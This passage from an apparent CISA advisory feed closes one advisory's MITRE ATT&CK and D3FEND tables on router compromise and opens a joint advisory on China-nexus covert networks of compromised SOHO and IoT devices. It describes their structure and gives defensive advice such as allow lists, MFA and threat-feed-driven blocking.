&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Exploitation for Privilege Escalation&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1068/&quot; target=&quot;_blank&quot;&gt;T1068&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Exploit publicly known CVEs for escalated privileges&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table 6: Stealth&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Obfuscated Files or Information&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1027/&quot; target=&quot;_blank&quot;&gt;T1027&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Obfuscate source IP addresses in system logs, as actions may be recorded as originating from local IP addresses&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table 7: Credential Access&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;OS Credential Dumping&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1003/&quot; target=&quot;_blank&quot;&gt;T1003&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Collect router configuration with weak Cisco Type 7 passwords and Type 0&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table 8: Collection&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Data from Configuration Repository: SNMP (MIB Dump)&amp;nbsp;&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1602/001/&quot; target=&quot;_blank&quot;&gt;T1602.001&lt;/a&gt;&amp;nbsp;&lt;/td&gt;
&lt;td&gt;Target MIB to collect network information via SNMP&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Data from Configuration Repository: Network Device Configuration Dump&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1602/002/&quot; target=&quot;_blank&quot;&gt;T1602.002&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Acquire credentials by collecting network device configurations&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table 9: Command and Control&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Proxy&amp;nbsp;&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1090/&quot; target=&quot;_blank&quot;&gt;T1090&lt;/a&gt;&amp;nbsp;&lt;/td&gt;
&lt;td&gt;Use VPS for C2&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Application Layer Protocol&amp;nbsp;&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1071/&quot; target=&quot;_blank&quot;&gt;T1071&lt;/a&gt;&amp;nbsp;&lt;/td&gt;
&lt;td&gt;Open and expose a variety of different services, including TFTP and FTP&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table 10: Exfiltration&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table10&quot;&gt;&lt;/a&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Exfiltration Over Alternative Protocol&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1048/&quot; target=&quot;_blank&quot;&gt;T1048&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Exfiltrating over a different protocol than that of the existing command and control channel.&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;&lt;strong&gt;Appendix B: MITRE D3FEND countermeasures&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;See &lt;a href=&quot;#Table11&quot;&gt;&lt;strong&gt;Table 11&lt;/strong&gt;&lt;/a&gt; for a mapping of several of the cybersecurity countermeasures mentioned in this advisory.&lt;/p&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table 11: MITRE D3FEND Countermeasures&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table11&quot;&gt;&lt;/a&gt;&lt;strong&gt;Countermeasure Title&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Application Configuration Hardening&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:ApplicationConfigurationHardening&quot; target=&quot;_blank&quot;&gt;D3-ACH&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Use SNMPv3 and disable SNMPv1 and SNMPv2.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Use SNMP allowlisting to restrict access to OIDs and MIBs.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Disable Cisco Smart Install.&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Message Authentication&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:MessageAuthentication&quot; target=&quot;_blank&quot;&gt;D3-MAN&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;ul&gt;
&lt;li&gt;Use SNMPv3 with strong authentication.&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Message Encryption&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:MessageEncryption&quot; target=&quot;_blank&quot;&gt;D3-MENCR&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;ul&gt;
&lt;li&gt;Use SNMPv3 to encrypt payloads.&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Credential Hardening&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:CredentialHardening&quot; target=&quot;_blank&quot;&gt;D3-CH&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;ul&gt;
&lt;li&gt;Use strong, unique passwords and store them securely.&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Platform Monitoring&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:PlatformMonitoring&quot; target=&quot;_blank&quot;&gt;D3-PM&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Monitor for unusual credentials.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Monitor SNMP Set-Requests for OIDs targeting sensitive device data.&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Network Traffic Filtering&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:NetworkTrafficFiltering&quot; target=&quot;_blank&quot;&gt;D3-NTF&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Use ACLs to only allow management protocols from management devices.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Block TFTP, SMI, and SNMP at edge firewalls.&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Network Vulnerability Assessment&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:NetworkVulnerabilityAssessment&quot; target=&quot;_blank&quot;&gt;D3-NVA&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;ul&gt;
&lt;li&gt;Use an attack surface management service.&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
</description>
  <pubDate>Wed, 08 Jul 2026 14:43:49 EDT</pubDate>
    <dc:creator>CISA</dc:creator>
    <guid isPermaLink="false">/node/25135</guid>
    </item>
<item>
  <title>Defending Against China-Nexus Covert Networks of Compromised Devices</title>
  <link>https://www.cisa.gov/news-events/cybersecurity-advisories/aa26-113a</link>
  <description>&lt;div class=&quot;SCXW131754345 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW131754345 BCX8&quot;&gt;
&lt;h2&gt;&lt;a class=&quot;c-button c-button--on-dark&quot; href=&quot;https://urldefense.us/v3/__https://www.ncsc.gov.uk/news/defending-against-china-nexus-covert-networks-of-compromised-devices__;!!BClRuOV5cvtbuNI!Cvg8stIR3jHWVZgHhCVvEwbwDXxXIRSprOQ9JtY2YKwxUIGVovuDAu7QrFsfw3sfAVd8-gxEMIpgldwlY-jTD7G0%24&quot;&gt;Defending against china-nexus covert networks of compromised devices&lt;/a&gt;&lt;/h2&gt;
&lt;h2&gt;&lt;a class=&quot;c-button c-button--on-dark&quot; href=&quot;https://urldefense.us/v3/__https://www.ncsc.gov.uk/news/executive-summary-defending-against-china-nexus-covert-networks-of-compromised-devices__;!!BClRuOV5cvtbuNI!Cvg8stIR3jHWVZgHhCVvEwbwDXxXIRSprOQ9JtY2YKwxUIGVovuDAu7QrFsfw3sfAVd8-gxEMIpgldwlYzP90Ign%24&quot;&gt;executive summary&lt;/a&gt;&lt;/h2&gt;
&lt;h2&gt;&lt;strong&gt;Defending against China-nexus covert networks of compromised devices&amp;nbsp;&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Explaining the widespread shift in tactics, techniques and procedures (TTPs) towards networks of compromised infrastructure, and how to defend against it&amp;nbsp;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Summary&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;With support from the UK &lt;a href=&quot;https://www.ncsc.gov.uk/information/cyber-league&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;Cyber League&lt;/u&gt;&lt;/a&gt;, this advisory has been jointly released by the National Cyber Security Centre (NCSC-UK) and international partners:&amp;nbsp;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Australian Signals Directorate’s (ASD’s) Australian Cyber Security Centre (ACSC)&lt;/li&gt;
&lt;li&gt;Communications Security Establishment Canada’s (CSE’s) Canadian Centre for Cyber Security (Cyber Centre)&lt;/li&gt;
&lt;li&gt;Germany Federal Office for the Protection of the Constitution -&amp;nbsp;&amp;nbsp; Bundesamt für Verfassungsschutz (BfV)&lt;/li&gt;
&lt;li&gt;Germany Federal Intelligence Service – Bundesnachrichtendienst (BND)&lt;/li&gt;
&lt;li&gt;Germany Federal Office for Information Security - Bundesamt für Sicherheit in der Informationstechnik (BSI)&lt;/li&gt;
&lt;li&gt;Japan National Cybersecurity Office (NCO) - 国家サイバー統括室&lt;/li&gt;
&lt;li&gt;Netherlands General Intelligence and Security Service - Algemene Inlichtingen- en Veiligheidsdienst (AIVD)&lt;/li&gt;
&lt;li&gt;Netherlands Defence Intelligence and Security Service - Militaire Inlichtingen- en Veiligheidsdienst (MIVD)&lt;/li&gt;
&lt;li&gt;New Zealand National Cyber Security Centre (NCSC-NZ)&lt;/li&gt;
&lt;li&gt;Spain National Cryptologic Centre – Centro Criptológico Nacional (CCN)&lt;/li&gt;
&lt;li&gt;Sweden National Cyber Security Centre - Nationellt cybersäkerhetscenter (NCSC-SE)&lt;/li&gt;
&lt;li&gt;United States Cybersecurity and Infrastructure Security Agency (CISA)&lt;/li&gt;
&lt;li&gt;United States Department of Defense Cyber Crime Center (DC3)&lt;/li&gt;
&lt;li&gt;United States Federal Bureau of Investigation (FBI)&lt;/li&gt;
&lt;li&gt;United States National Security Agency (NSA)&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Its purpose is to provide network defenders with the tools needed to defend against China-nexus cyber actors and their tactic of using large scale networks of compromised devices (covert networks) to route their cyber activity.&amp;nbsp;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Introduction&amp;nbsp;&amp;nbsp;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Over the past few years there has been a major shift in the tactics, techniques and procedures (TTPs) used by China-nexus cyber actors, moving away from the use of individually procured infrastructure, and towards the use of externally provisioned, large-scale networks of compromised devices.&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW149482171 BCX8&quot;&gt;
&lt;p&gt;The NCSC believes that the majority of China-nexus threat actors are using these networks (hereafter “covert networks”), that multiple covert networks have been created and are being constantly updated, and that a single covert network could be being used by multiple actors. These networks are mainly made up of compromised Small Office Home Office (SOHO) routers, as well as Internet of Things (IoT) and smart devices.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW149482171 BCX8&quot;&gt;
&lt;p&gt;Anyone who is a target of China-nexus cyber actors may be impacted by the use of covert networks. They have been &lt;a href=&quot;https://www.ncsc.gov.uk/news/ncsc-and-partners-issue-warning-about-state-sponsored-cyber-attackers-hiding-on-critical-infrastructure-networks&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;used by Chinese state-sponsored actors Volt Typhoon&lt;/u&gt;&lt;/a&gt; to pre-position offensive cyber capabilities on critical national infrastructure. The group &lt;a href=&quot;https://www.ncsc.gov.uk/news/ncsc-and-partners-issue-advice-to-counter-china-linked-campaign-targeting-thousands-of-devices&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;Flax Typhoon used a different covert network&lt;/u&gt;&lt;/a&gt; of compromised infrastructure to conduct cyber espionage.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW149482171 BCX8&quot;&gt;
&lt;p&gt;The use of covert networks of compromised devices - also known as botnets - to facilitate malicious cyber activity is not new, but China-nexus cyber actors are now using them strategically, and at scale.&amp;nbsp;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW149482171 BCX8&quot;&gt;
&lt;p&gt;This advisory describes the typical makeup of a covert network and what they are being used for. It also includes protective advice for organizations being targeted by cyber activity using a covert network as an access vector.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Covert Networks&amp;nbsp;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Covert networks are used to connect across the internet in a low-cost, low-risk, deniable way, disguising the origin and attribution of malicious activity. Actors have been observed using them for each phase of their Cyber Kill Chains, from performing scans as part of reconnaissance, to the delivery of malware, communicating with said malware, and exfiltrating stolen data from a victim. They can also be used for general deniable internet browsing, allowing threat actors to research exploitation techniques, new TTPs, and their victims without attribution. Some covert networks are also used by legitimate customers to browse the internet, making it challenging to attribute malicious activity.&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW53561783 BCX8&quot;&gt;
&lt;p&gt;There is evidence that covert networks used by China-nexus actors are created and maintained by Chinese information security companies. A network known to network defenders as Raptor Train, which in 2024 infected more than 200,000 devices worldwide, was controlled and managed by the Chinese company, Integrity Technology Group. This company was also &lt;a href=&quot;https://www.justice.gov/archives/opa/pr/court-authorized-operation-disrupts-worldwide-botnet-used-peoples-republic-china-state&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;assessed by the FBI&lt;/u&gt;&lt;/a&gt; to be responsible for the computer intrusion activities attributed to China-based hackers known as Flax Typhoon.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW53561783 BCX8&quot;&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Botnet operations represent a significant threat to the UK by exploiting vulnerabilities in everyday internet-connected devices with the potential to carry out large-scale cyber attacks – NCSC Director of Operations, Paul Chichester&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW53561783 BCX8&quot;&gt;
&lt;p&gt;Covert networks mostly consist of compromised SOHO routers, but they also pull in any vulnerable device they can exploit at scale. Raptor Train was made up of thousands of SOHO routers and IoT devices, such as web cameras and video recorders, as well as firewalls and Network Attached Storage (NAS) devices. The KV Botnet used by Volt Typhoon &lt;a href=&quot;https://www.justice.gov/archives/opa/pr/us-government-disrupts-botnet-peoples-republic-china-used-conceal-hacking-critical&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;was mainly made up of vulnerable Cisco and NetGear routers&lt;/u&gt;&lt;/a&gt;. The edge devices were vulnerable because they were “end of life” – out of date and no longer receiving updates or security patches by their manufacturers.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW53561783 BCX8&quot;&gt;
&lt;p&gt;The cyber security industry has been aware of examples of these networks for some time and has publicly reported on the widespread scale of the threat and its implications. Mandiant Intelligence produced a &lt;a href=&quot;https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;public blog in May 2024&lt;/u&gt;&lt;/a&gt; talking about covert networks in which they highlighted a key issue for defenders – indicator of compromise (IOC) Extinction. If a particular threat group could now come from one of many covert networks, each with potentially hundreds of thousands of endpoints, and each used by multiple threat actors, old network defense paradigms of static malicious IP block lists will be less effective. This is compounded by the dynamic nature of these networks where new nodes will be added as old devices are patched or removed from use.&amp;nbsp;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Typical Network Topology&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The number of covert networks used by China-nexus cyber actors is large, with new networks regularly developed and deployed. The existing covert networks change too, either because of defensive or legal action, or simply as a result of software updates and new exploits being used to target different technologies for incorporation into the network.&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW21942648 BCX8&quot;&gt;
&lt;p&gt;Because of this, a description of all known covert networks in detail, including how they are constructed and how they communicate, would immediately be out of date – and for most network defenders would not be practically useful.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW21942648 BCX8&quot;&gt;
&lt;p&gt;However, most covert networks of compromised devices use the same basic set up. Understanding this generalized structure can aid researchers and defenders by helping them to understand which part of a network they may have found, and how to defend against it.&amp;nbsp;&lt;/p&gt;



&lt;figure class=&quot;c-figure c-figure--image&quot; role=&quot;group&quot;&gt;
  
  &lt;div class=&quot;c-figure__media&quot;&gt;    &lt;img loading=&quot;lazy&quot; src=&quot;/sites/default/files/styles/large/public/2026-04/A%20diagram%20illustrating%20the%20basic%20setup%20of%20a%20covert%20network..png?itok=3Bfm4nKj&quot; width=&quot;1024&quot; height=&quot;877&quot; alt=&quot;A diagram illustrating the basic setup of a covert network.&quot;&gt;



&lt;/div&gt;
      &lt;figcaption class=&quot;c-figure__caption&quot;&gt;A diagram illustrating the basic setup of a covert network.&lt;/figcaption&gt;
  &lt;/figure&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW75515976 BCX8&quot;&gt;
&lt;p&gt;The diagram above illustrates the basic setup of a covert network, where typically an actor will connect to the network via an on-ramp or entry node. Their traffic will be forwarded through multiple compromised devices, used as traversal nodes, before exiting the network from an exit node, usually in the same geographic region as the target.&amp;nbsp;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Protective Advice&amp;nbsp;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Defending from attackers using covert networks is not straightforward, and defensive tactics will be different based on the levels of resource and the nature of the target organization. General advice for good cyber security practice should be followed, and some key messages can be found in the appendix of this advisory.&amp;nbsp;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW75515976 BCX8&quot;&gt;
&lt;p&gt;The following advice is specifically tailored to steps which can be taken to combat the risk of attacks coming from large, dynamic networks of compromised devices.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW75515976 BCX8&quot;&gt;
&lt;p&gt;Further guidance for all organizations facing cyber security threats is available on the NCSC website.&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;This guidance should be considered alongside all applicable laws and regulations of the UK and co-sealing countries relating to the security of networks and data. It will be each organization’s responsibility to ensure compliance with any such laws and regulations. Organizations should note that following the recommended actions set out below will not remove all risks.&lt;/em&gt;&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;All organizations&lt;/strong&gt;&lt;/h4&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW75515976 BCX8&quot;&gt;
&lt;p&gt;The NCSC recommends the following steps for all affected organizations to either take themselves, or ask their managed service and/or security providers to investigate for them:&amp;nbsp;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Map and understand network edge devices, developing a clear understanding of organizational assets and what should be connecting to them.&lt;/li&gt;
&lt;li&gt;Baseline normal connections, especially to corporate virtual private networks (VPNs) or other similar services.
&lt;ul&gt;
&lt;li&gt;Would you expect connections from consumer broadband ranges?&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Leverage available dynamic threat feeds which include covert network infrastructure.&lt;/li&gt;
&lt;li&gt;Implement multifactor authentication for remote connections.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Smaller organizations should consider creating and actioning a &lt;a href=&quot;https://cybertoolkit.service.ncsc.gov.uk/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;free NCSC Cyber Action Toolkit&lt;/u&gt;&lt;/a&gt;.&amp;nbsp;&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Larger or more at-risk organizations&lt;/strong&gt;&lt;/h4&gt;
&lt;div class=&quot;SCXW242856196 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p&gt;Some more comprehensive measures may be appropriate if the risk to an organization is high enough, to be conducted either in-house or through a security provider:&amp;nbsp;&amp;nbsp;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Apply IP address allow lists rather than deny lists for connections to corporate VPNs for remote workers.&lt;/li&gt;
&lt;li&gt;Use geographic allow lists or profile incoming connections based on operating system, time zones, and/or organization specific system configuration settings.&lt;/li&gt;
&lt;li&gt;Implement zero trust policies for connections.&lt;/li&gt;
&lt;li&gt;Enforce machine certificates for Secure Sockets Layer (SSL) connections.&lt;/li&gt;
&lt;li&gt;Reduce the internet-facing presence of the IT estate.&lt;/li&gt;
&lt;li&gt;Investigate machine learning techniques to profile normal network edge activity to detect and block anomalies.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href=&quot;https://www.ncsc.gov.uk/cyberessentials/overview&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;The NCSC&#039;s Cyber Essentials&lt;/u&gt;&lt;/a&gt; can help protect organizations of all sizes.&amp;nbsp;&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Largest or most at-risk organizations&lt;/strong&gt;&amp;nbsp;&lt;/h4&gt;
&lt;p&gt;If Advanced Persistent Threat (APT) tracking is part of an organization’s in-house capability, or if it is part of the service provided by a security vendor, consider tracking China-nexus covert networks as APTs in their own right.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Active hunting – look for connections from IP addresses likely to be part of a covert network of compromised devices, for instance those hosting SOHO routers or IoT devices.&lt;/li&gt;
&lt;li&gt;Track and map covert networks reported by industry or government by looking at banners and certificates.&lt;/li&gt;
&lt;li&gt;Use threat reporting and threat feeds to create and implement dynamic blocklists and create alert rules to detect incoming threats.&lt;/li&gt;
&lt;li&gt;Consider using NetFlow feeds to look upstream and map covert networks to find new nodes.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
